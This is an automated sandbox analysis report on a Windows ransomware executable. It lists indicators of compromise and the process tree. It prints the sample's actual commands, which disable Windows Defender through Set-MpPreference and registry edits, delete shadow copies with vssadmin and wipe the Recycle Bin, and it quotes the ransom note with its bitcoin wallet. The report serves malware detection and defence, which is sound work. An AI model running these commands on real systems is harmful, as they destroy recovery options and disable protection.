Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
27-02-2024 00:12
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10-20240221-en
Behavioral task
behavioral3
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10-20240221-en
Behavioral task
behavioral4
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10-20240221-en
General
-
Target
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
-
Size
82KB
-
MD5
e01e11dca5e8b08fc8231b1cb6e2048c
-
SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a
-
SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
-
SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
-
SSDEEP
1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/3696-0-0x0000000000DB0000-0x0000000000DCA000-memory.dmp disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 13 5272 mshta.exe 16 5272 mshta.exe 18 5272 mshta.exe 19 5272 mshta.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 3 raw.githubusercontent.com 11 raw.githubusercontent.com 2 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3640 sc.exe 1012 sc.exe 3484 sc.exe 4676 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 792 vssadmin.exe 2572 vssadmin.exe 796 vssadmin.exe 5112 vssadmin.exe 1908 vssadmin.exe 2524 vssadmin.exe 2932 vssadmin.exe 3792 vssadmin.exe 3680 vssadmin.exe 2536 vssadmin.exe 3596 vssadmin.exe 3388 vssadmin.exe 2372 vssadmin.exe 3624 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 3044 taskkill.exe 5068 taskkill.exe 2328 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6332 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 4432 powershell.exe 4432 powershell.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeIncreaseQuotaPrivilege 4432 powershell.exe Token: SeSecurityPrivilege 4432 powershell.exe Token: SeTakeOwnershipPrivilege 4432 powershell.exe Token: SeLoadDriverPrivilege 4432 powershell.exe Token: SeSystemProfilePrivilege 4432 powershell.exe Token: SeSystemtimePrivilege 4432 powershell.exe Token: SeProfSingleProcessPrivilege 4432 powershell.exe Token: SeIncBasePriorityPrivilege 4432 powershell.exe Token: SeCreatePagefilePrivilege 4432 powershell.exe Token: SeBackupPrivilege 4432 powershell.exe Token: SeRestorePrivilege 4432 powershell.exe Token: SeShutdownPrivilege 4432 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeSystemEnvironmentPrivilege 4432 powershell.exe Token: SeRemoteShutdownPrivilege 4432 powershell.exe Token: SeUndockPrivilege 4432 powershell.exe Token: SeManageVolumePrivilege 4432 powershell.exe Token: 33 4432 powershell.exe Token: 34 4432 powershell.exe Token: 35 4432 powershell.exe Token: 36 4432 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2328 taskkill.exe Token: SeDebugPrivilege 3044 taskkill.exe Token: SeDebugPrivilege 5068 taskkill.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeIncreaseQuotaPrivilege 1392 powershell.exe Token: SeSecurityPrivilege 1392 powershell.exe Token: SeTakeOwnershipPrivilege 1392 powershell.exe Token: SeLoadDriverPrivilege 1392 powershell.exe Token: SeSystemProfilePrivilege 1392 powershell.exe Token: SeSystemtimePrivilege 1392 powershell.exe Token: SeProfSingleProcessPrivilege 1392 powershell.exe Token: SeIncBasePriorityPrivilege 1392 powershell.exe Token: SeCreatePagefilePrivilege 1392 powershell.exe Token: SeBackupPrivilege 1392 powershell.exe Token: SeRestorePrivilege 1392 powershell.exe Token: SeShutdownPrivilege 1392 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeSystemEnvironmentPrivilege 1392 powershell.exe Token: SeRemoteShutdownPrivilege 1392 powershell.exe Token: SeUndockPrivilege 1392 powershell.exe Token: SeManageVolumePrivilege 1392 powershell.exe Token: 33 1392 powershell.exe Token: 34 1392 powershell.exe Token: 35 1392 powershell.exe Token: 36 1392 powershell.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 5264 firefox.exe 5264 firefox.exe 5264 firefox.exe 5264 firefox.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 5264 firefox.exe 5264 firefox.exe 5264 firefox.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3992 OpenWith.exe 5264 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3696 wrote to memory of 4432 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 74 PID 3696 wrote to memory of 4432 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 74 PID 3696 wrote to memory of 1392 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 77 PID 3696 wrote to memory of 1392 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 77 PID 3696 wrote to memory of 3520 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 79 PID 3696 wrote to memory of 3520 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 79 PID 3696 wrote to memory of 4036 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 81 PID 3696 wrote to memory of 4036 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 81 PID 3696 wrote to memory of 1984 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 83 PID 3696 wrote to memory of 1984 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 83 PID 3696 wrote to memory of 4772 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 88 PID 3696 wrote to memory of 4772 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 88 PID 3696 wrote to memory of 3504 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 86 PID 3696 wrote to memory of 3504 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 86 PID 3696 wrote to memory of 2828 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 89 PID 3696 wrote to memory of 2828 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 89 PID 3696 wrote to memory of 3844 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 91 PID 3696 wrote to memory of 3844 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 91 PID 3696 wrote to memory of 1404 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 93 PID 3696 wrote to memory of 1404 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 93 PID 3696 wrote to memory of 1208 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 95 PID 3696 wrote to memory of 1208 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 95 PID 3696 wrote to memory of 4776 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 97 PID 3696 wrote to memory of 4776 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 97 PID 3696 wrote to memory of 560 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 209 PID 3696 wrote to memory of 560 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 209 PID 3696 wrote to memory of 4448 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 207 PID 3696 wrote to memory of 4448 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 207 PID 3696 wrote to memory of 312 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 206 PID 3696 wrote to memory of 312 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 206 PID 3696 wrote to memory of 516 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 205 PID 3696 wrote to memory of 516 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 205 PID 3696 wrote to memory of 528 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 204 PID 3696 wrote to memory of 528 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 204 PID 3696 wrote to memory of 2180 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 203 PID 3696 wrote to memory of 2180 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 203 PID 3696 wrote to memory of 4156 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 202 PID 3696 wrote to memory of 4156 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 202 PID 3696 wrote to memory of 4152 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 201 PID 3696 wrote to memory of 4152 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 201 PID 3696 wrote to memory of 4272 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 200 PID 3696 wrote to memory of 4272 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 200 PID 3696 wrote to memory of 4148 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 148 PID 3696 wrote to memory of 4148 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 148 PID 3696 wrote to memory of 4056 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 147 PID 3696 wrote to memory of 4056 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 147 PID 3696 wrote to memory of 208 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 146 PID 3696 wrote to memory of 208 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 146 PID 3696 wrote to memory of 200 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 145 PID 3696 wrote to memory of 200 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 145 PID 3696 wrote to memory of 2836 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 144 PID 3696 wrote to memory of 2836 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 144 PID 3696 wrote to memory of 2312 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 143 PID 3696 wrote to memory of 2312 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 143 PID 3696 wrote to memory of 1484 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 142 PID 3696 wrote to memory of 1484 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 142 PID 3696 wrote to memory of 1408 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 141 PID 3696 wrote to memory of 1408 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 141 PID 3696 wrote to memory of 2176 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 140 PID 3696 wrote to memory of 2176 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 140 PID 3696 wrote to memory of 2668 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 139 PID 3696 wrote to memory of 2668 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 139 PID 3696 wrote to memory of 4212 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 138 PID 3696 wrote to memory of 4212 3696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:3928
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2572
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3596
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:796
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5112
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:792
-
-
